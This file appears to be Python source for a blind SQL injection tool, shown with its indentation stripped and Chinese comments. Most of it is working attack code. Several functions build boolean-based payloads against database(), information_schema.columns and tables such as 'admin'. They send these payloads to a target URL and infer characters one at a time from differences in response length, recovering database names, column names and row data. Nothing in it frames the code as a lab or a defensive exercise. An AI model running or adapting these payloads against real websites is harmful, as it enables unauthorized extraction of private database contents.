def get_dbname2(url=glovar.url3, cookie=False, type='search', dblength=9):
dbname = []
response_length = 0
payloads = ["97", "98", "99", "100", "101", "102", "103", "104", "105", "106", "107", "108", "109", "110", "111",
"112", "113", "114", "115", "116", "117", "118", "119", "120", "121", "122",
"95",
"48", "49", "50", "51", "52", "53", "54", "55", "56", "57"]
if type == 'int':
payload = '+and+substr(database(),{dbname_str_localtion},1)={ascii_number}'
elif type == 'string':
payload = '\'+and+substr(database(),{dbname_str_localtion},1)={ascii_number}%23'
elif type == 'search':
payload = '%\'+and+substr(database(),{dbname_str_localtion},1)={ascii_number}%23'
payloads = glofun.ascii_list_convert_to_hex_list(payloads)
for j in payloads:
full_payload = url + payload.format(dbname_str_localtion=str(1), ascii_number=str(j))
url_read_length = len(glofun.url_request(full_payload, cookie))
if (url_read_length-response_length) > 50:
response_length = url_read_length
dbname = []
dbname.append(j)
for i in range(2, dblength + 1):
for j in payloads:
full_payload = url + payload.format(dbname_str_localtion=str(i), ascii_number=str(j))
url_read_length = len(glofun.url_request(full_payload, cookie))
if (response_length - url_read_length) < 50:
dbname.append(j)
print(dbname)
break
print(dbname)
print(glofun.ascii_list_convert_to_string(glofun.hex_list_convert_to_dec_list(dbname)))
def get_dbname(url=glovar.url3, cookie=False, type='search', dblength=9):
dbname = ''
response_length = 0
if type == 'int':
payload = '+or+if((select+ascii(substr((select+database()),{dbname_str_localtion},1))={ascii_number}),1,0)'
elif type == 'string':
payload = '\'+or+if((select+ascii(substr((select+database()),{dbname_str_localtion},1))={ascii_number}),1,0)%23'
elif type == 'search':
payload = '%\'+or+if((select+ascii(substr((select+database()),{dbname_str_localtion},1))={ascii_number}),1,0)%23'
payloads = ["97", "98", "99", "100", "101", "102", "103", "104", "105", "106", "107", "108", "109", "110", "111",
"112", "113", "114", "115", "116", "117", "118", "119", "120", "121", "122",
"95",
"48", "49", "50", "51", "52", "53", "54", "55", "56", "57"]
for j in payloads:
full_payload = url + payload.format(dbname_str_localtion=str(1), ascii_number=str(j))
print(full_payload)
url_read_length = len(glofun.url_request(full_payload, cookie))
if (url_read_length-response_length) > 50:
response_length = url_read_length
dbname = chr(int(j))
for i in range(2, dblength + 1):
for j in payloads:
full_payload = url + payload.format(dbname_str_localtion=str(i), ascii_number=str(j))
url_read_length = len(glofun.url_request(full_payload, cookie))
if (response_length - url_read_length) < 50:
dbname += chr(int(j))
print(dbname)
break
print(dbname)
def get_rowcount(url=glovar.url3, cookie=False, type='search', tbname='admin'):
response_length = 0
# 查数据库test中表的个数 基础知识--这里的方法只使用与表的个数少于10的,要是多多于10的话substr(({sql}),2,1)要这样增加截取,或者substr(({sql}),1,2)
if type == 'int':
payload = '+or+if((select+count(*)+from+' + tbname + ')={tbcount},1,0)'
elif type == 'string':
payload = '\'+or+if((select+count(*)+from+' + tbname + ')={tbcount},1,0)%23'
elif type == 'search':
payload = '%\'+or+if((select+count(*)+from+' + tbname + ')={tbcount},1,0)%23'
for i in range(0, 100000):
full_payload = url + payload.format(tbcount=str(i))
url_read = glofun.url_request(full_payload, cookie)
if response_length > len(url_read):
print("table %s row count is %d" % (tbname, i - 1))
break
response_length = len(url_read)
def get_columndata(row_order):
url = glovar.url3
cookie = False
type = 'search'
tbname = 'comment'
coname = 'comment_text'
response_length = 0
single_data = ""
tbname_list = []
if type == 'int':
payload = '+or+if((select+ascii(substr((select+' + coname + '+from+' + tbname + '+limit+{data_row_order},1),{data_location},1))={ascii_number}),1,0)'
elif type == 'string':
payload = '\'+or+if((select+ascii(substr((select+' + coname + '+from+' + tbname + '+limit+{data_row_order},1),{data_location},1))={ascii_number}),1,0)%23'
elif type == 'search':
payload = '%\'+or+if((select+ascii(substr((select+' + coname + '+from+' + tbname + '+limit+{data_row_order},1),{data_location},1))={ascii_number}),1,0)%23'
payloads = [
"0", "32", "46", "58", "95", "97", "98", "99", "100", "101", "102",
"103", "104", "105", "106", "107", "108", "109", "110", "111", "112",
"113", "114", "115", "116", "117", "118", "119", "120", "121", "122",
"48", "49", "50", "51", "52", "53", "54", "55", "56", "57"
]
for i in range(65, 91):
payloads.append(str(i))
# 0 NULL 32 space 95 _
for k in range(1, 35):
for j in payloads:
full_payload = url + payload.format(data_row_order=str(row_order),
data_location=str(k),
ascii_number=str(j))
url_read = glofun.url_request(full_payload, cookie)
url_read_length = len(url_read)
if (url_read_length - response_length) > 50:
response_length = url_read_length # 与之前的包大小相差很大,所以取较大的返回包大小为正确的返回包
single_data = chr(int(j))
print(single_data)
elif (response_length -
url_read_length) < 50: # 如果返回包的长度等于或者在比之前包只小了100之内,则是正确的包
# 如果返回了0,说明返回的是NULL,到了表名字的结果,跳出,寻找下一个表
if k != 1:
if j == '0':
tbname_list.append(single_data)
print(single_data)
single_data = ""
break
single_data += chr(int(j))
print(single_data)
# 跳出多重循环
else:
continue
break
print(tbname_list)
return single_data
def get_coname(url=glovar.url3,
cookie=False,
type='search',
tbname='admin',
cocount=3):
response_length = 0
coname = ""
coname_list = []
hex_tbname = glofun.string_convert_to_hex(tbname)
if type == 'int':
payload = '+or+if((select+ascii(substr((select+column_name+from+information_schema.columns+where+table_name=' + hex_tbname + '+limit+{coname_order_number},1),{coname_str_location},1))={ascii_number}),1,0)'
elif type == 'string':
payload = '\'+or+if((select+ascii(substr((select+column_name+from+information_schema.columns+where+table_name=' + hex_tbname + '+limit+{coname_order_number},1),{coname_str_location},1))={ascii_number}),1,0)%23'
elif type == 'search':
payload = '%\'+or+if((select+ascii(substr((select+column_name+from+information_schema.columns+where+table_name=' + hex_tbname + '+limit+{coname_order_number},1),{coname_str_location},1))={ascii_number}),1,0)%23'
payloads = [
"0", "95", "97", "98", "99", "100", "101", "102", "103", "104", "105",
"106", "107", "108", "109", "110", "111", "112", "113", "114", "115",
"116", "117", "118", "119", "120", "121", "122", "48", "49", "50",
"51", "52", "53", "54", "55", "56", "57"
]
# _ 95 NULL 0
for j in payloads:
full_payload = url + payload.format(coname_order_number=str(0),
coname_str_location=str(1),
ascii_number=str(j))
url_read_length = len(glofun.url_request(full_payload, cookie))
if (url_read_length - response_length) > 50:
response_length = url_read_length # 与之前的包大小相差很大,所以取较大的返回包大小为正确的返回包
for i in range(0, cocount):
for k in range(1, 35):
for j in payloads:
full_payload = url + payload.format(coname_order_number=str(i),
coname_str_location=str(k),
ascii_number=str(j))
url_read_length = len(glofun.url_request(full_payload, cookie))
if (response_length - url_read_length
) < 50: # 如果返回包的长度等于或者在比之前包只小了100之内,则是正确的包
if k != 1:
if j == '0':
coname_list.append(coname)
print(coname)
coname = ""
break
coname += chr(int(j))
print(coname)
# 如果返回了0,说明返回的是NULL,到了表名字的结果,跳出,寻找下一个表
# 跳出多重循环
else:
continue
break
print(coname_list)
return coname_list
def get_single_column_data_by_response_length(self, row_order):
local_data.row_order = row_order
local_data.coname = self.coname
local_data.url_read_length = 0
local_data.response_length = 0
local_data.single_data = ''
local_data.return_data = ''
for j in self.ascii_value:
full_payload = self.url + self.payload.format(
coname=str(local_data.coname),
data_row_order=str(local_data.row_order),
data_location=str(1),
ascii_number=str(j))
url_read = glofun.url_request(full_payload, self.cookie)
local_data.url_read_length = len(url_read)
if (local_data.url_read_length - local_data.response_length) > 50:
local_data.response_length = local_data.url_read_length # 与之前的包大小相差很大,所以取较大的返回包大小为正确的返回包
local_data.single_data = chr(int(j))
print(local_data.single_data)
for k in range(2, 35):
for j in self.ascii_value:
local_data.fuc_start = time.time()
full_payload = self.url + self.payload.format(
coname=str(local_data.coname),
data_row_order=str(local_data.row_order),
data_location=str(k),
ascii_number=str(j))
url_read = glofun.url_request(full_payload, self.cookie)
local_data.url_read_length = len(url_read)
# 如果返回包的长度等于或者在比之前包只小了100之内,则是正确的包
if (local_data.response_length -
local_data.url_read_length) < 50:
# 如果返回了0,说明返回的是NULL,到了表名字的结果,跳出,寻找下一个表
if k != 1:
if j == '0':
print(local_data.single_data)
local_data.return_data = local_data.single_data
local_data.single_data = ""
break
local_data.single_data += chr(int(j))
print(local_data.single_data)
# 跳出多重循环
else:
continue
break
print(local_data.return_data)
return local_data.return_data